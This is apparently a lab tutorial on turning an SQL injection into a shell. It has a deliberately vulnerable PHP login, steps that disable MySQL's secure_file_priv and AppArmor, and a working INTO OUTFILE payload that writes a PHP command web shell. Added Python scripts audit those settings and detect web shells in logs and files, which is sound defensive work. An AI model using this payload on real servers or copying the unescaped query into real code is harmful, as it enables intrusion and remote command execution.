Saturday, July 8, 2017

shell from sql injection

1- create the login database (save the SQL below as user.sql and load it with the command that follows):
create database login;
use login;
CREATE TABLE `login` (
  `id` INT NOT NULL AUTO_INCREMENT,
  `user` varchar(100) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`)
);

insert into login(user,password) values('user1','pass1');
insert into login(user,password) values('user2','pass2');

$ mysql -u root -p < user.sql

2- set up your web test directory in /var/www/html/test
***index.php ***


<?php
session_start();

define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'me');
define('DB_DATABASE', 'login');

$db = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_DATABASE);
if (!$db) {
    die('Connection failed: ' . mysqli_connect_error());
}

$show = true;   // show the login form until a login succeeds
$msg  = '';
if ($_POST) {
    // Deliberately vulnerable: the submitted values go into the query text unescaped.
    $user = $_POST['user'];
    $pass = $_POST['pass'];
    // $user = mysqli_real_escape_string($db,$_POST['user']);

    $sql = "SELECT id FROM login WHERE user = '$user' and password = '$pass'";
    //file_put_contents('php://stderr', print_r($sql, TRUE));
    $result = mysqli_query($db, $sql);
    // An injected INTO OUTFILE returns no result set, so only count rows when there is one.
    $count = ($result instanceof mysqli_result) ? mysqli_num_rows($result) : 0;

    if ($count == 1) {
        $_SESSION['login_user'] = $user;
        $msg  = "<br>login successful <br>";
        $show = false;
    } else {
        $msg = "wrong password <br>";
    }
}
?>
<html>
<head><title>Login form</title></head>
<body>
<?php
if ($show == false) {
    echo '<a href="."> logout! </a>';
    echo $msg;
} else {
    echo '<form method="post" action="index.php">';
    echo 'Username:<input type="text" size="100" maxlength="120" name="user"><br />';
    echo 'Password:<input type="password" size="100" maxlength="360" name="pass"><br />';
    echo $msg;
    echo '<input type="submit" name="login" value="Login">';
    echo '</form>';
}
?>
</body>
</html>

3- disable secure_file_priv in MySQL (the setting goes in /etc/mysql/my.cnf)

if your server shows the value below, INTO OUTFILE can only write into that directory, so the file lands where the web server will not execute it
mysql> SHOW VARIABLES LIKE "secure_file_priv";
| Variable_name    | Value                 |
| secure_file_priv | /var/lib/mysql-files/ |
1 row in set (0.00 sec)
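Steps 3 and 4 are the two controls the lab switches off, and they are also what a defender checks first. The audit below is an added example, not code from the post: it parses the mysql client output shown above (plus a constructed second sample with the setting cleared and constructed SHOW GRANTS lines) and flags the conditions that let SELECT ... INTO OUTFILE reach a web root: an empty secure_file_priv, a secure_file_priv directory that overlaps the web root, and an application account holding the FILE privilege, which INTO OUTFILE requires. The `webapp` account name and the grant strings are assumptions.

```python
import re

# Constructed: output of `SHOW VARIABLES LIKE "secure_file_priv";` in the
# default restricted state (the value shown on the page), with client borders.
SHOW_VARS_RESTRICTED = """\
+------------------+-----------------------+
| Variable_name    | Value                 |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
"""

# Constructed: the same query after the setting has been cleared in my.cnf.
SHOW_VARS_UNRESTRICTED = """\
| Variable_name    | Value |
| secure_file_priv |       |
"""

# Constructed SHOW GRANTS output for the root account used by index.php and for
# a hypothetical least-privilege 'webapp' account.
GRANTS_ROOT = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"
GRANTS_APP = "GRANT SELECT ON `login`.* TO 'webapp'@'localhost'"

ROW_RE = re.compile(r"^\|\s*(\S+)\s*\|\s*(.*?)\s*\|$")


def parse_show_variables(output):
    """Return {variable_name: value} from the tabular mysql client output."""
    found = {}
    for line in output.splitlines():
        m = ROW_RE.match(line.strip())
        if m and m.group(1) != "Variable_name":
            found[m.group(1)] = m.group(2)
    return found


def assess_secure_file_priv(value):
    """Classify secure_file_priv: NULL refuses file I/O entirely, a path confines
    it to that directory, and an empty string lets mysqld write anywhere it can."""
    if value is None:
        return "unknown"
    if value.upper() == "NULL":
        return "disabled"
    if value == "":
        return "unrestricted"
    return "restricted"


def grants_include_file(grant_statement):
    """True if the grant carries FILE, directly or via ALL PRIVILEGES ON *.*."""
    s = grant_statement.upper()
    return bool(re.search(r"\bFILE\b", s)) or "ALL PRIVILEGES ON *.*" in s


def _is_within(child, parent):
    child, parent = child.rstrip("/") or "/", parent.rstrip("/") or "/"
    return child == parent or parent == "/" or child.startswith(parent + "/")


def audit(show_vars_output, grant_statement, webroot="/var/www/html"):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    value = parse_show_variables(show_vars_output).get("secure_file_priv")
    state = assess_secure_file_priv(value)
    if state == "unknown":
        findings.append("could not read secure_file_priv from the output")
    elif state == "unrestricted":
        findings.append("secure_file_priv is empty: INTO OUTFILE may write into " + webroot)
    elif state == "restricted" and (_is_within(webroot, value) or _is_within(value, webroot)):
        findings.append("secure_file_priv directory %s overlaps the web root" % value)
    if grants_include_file(grant_statement):
        findings.append("application account holds FILE privilege (required for INTO OUTFILE)")
    return findings
```

Run `audit(SHOW_VARS_UNRESTRICTED, GRANTS_ROOT)` to see both findings the lab depends on; the restricted output with the `webapp` grant produces none, which is the state a production server should be in.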

4- disable AppArmor (otherwise the mysqld profile blocks writes outside the paths it allows),
$ sudo /etc/init.d/apparmor stop
$ sudo /etc/init.d/apparmor teardown

5- create the shell by submitting the following SQL injection in the user input box
user10' union select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/test/out.php';#

6- now, to list the root directory, request the following URL
http://serverip/test/out.php?cmd=ls /
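Steps 5 and 6 leave two artifacts a defender can look for: a new PHP file under the web root that passes request data to a command-execution function, and an access-log entry for a PHP file carrying a command parameter. The script below is an added example, not code from the post, showing both checks over constructed input: three constructed Apache combined-format log lines (the client addresses are made up) and a throwaway web root holding the out.php content written in step 5 beside a benign, constructed index.php.

```python
import os
import re
import tempfile

# Constructed Apache combined-format access log: an ordinary login POST, the
# step 6 request against the dropped out.php, and an unrelated GET.
ACCESS_LOG = """\
10.0.0.5 - - [08/Jul/2017:10:12:01 +0000] "POST /test/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [08/Jul/2017:10:12:09 +0000] "GET /test/out.php?cmd=ls%20/ HTTP/1.1" 200 1844 "-" "Mozilla/5.0"
10.0.0.7 - - [08/Jul/2017:10:13:00 +0000] "GET /test/index.php HTTP/1.1" 200 512 "-" "curl/7.52"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Query parameter names that carry a command to a dropped shell; 'cmd' is the one the post uses.
CMD_PARAM_RE = re.compile(r"[?&](cmd|exec|command)=", re.I)


def suspicious_requests(log_text):
    """Return (client, path) for requests to .php files that carry a command-style parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        path = target.split("?", 1)[0]
        if path.endswith(".php") and CMD_PARAM_RE.search(target):
            hits.append((client, path))
    return hits


# PHP source pattern: a command-execution function fed directly from request data.
SHELL_SRC_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(REQUEST|GET|POST)\b", re.I)


def scan_webroot(root):
    """Return root-relative paths of .php files whose source matches SHELL_SRC_RE."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                if SHELL_SRC_RE.search(fh.read()):
                    found.append(os.path.relpath(full, root))
    return sorted(found)


def demo():
    """Build a throwaway web root with the step 5 file and a benign file, then run both checks."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "test"))
        with open(os.path.join(root, "test", "out.php"), "w") as fh:
            fh.write("<?php system($_REQUEST['cmd']); ?>\n")   # content INTO OUTFILE wrote in step 5
        with open(os.path.join(root, "test", "index.php"), "w") as fh:
            fh.write("<?php echo 'Login form'; ?>\n")          # benign, constructed
        return scan_webroot(root), suspicious_requests(ACCESS_LOG)


if __name__ == "__main__":
    shells, requests = demo()
    print("shell-like files:", shells)
    print("command requests:", requests)
```

On a real host, pair the file scan with a modification-time filter (files newer than the last deployment) and with a write-permission check: if the mysql user can create files under /var/www/html at all, the permission model is already broken independently of secure_file_priv.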
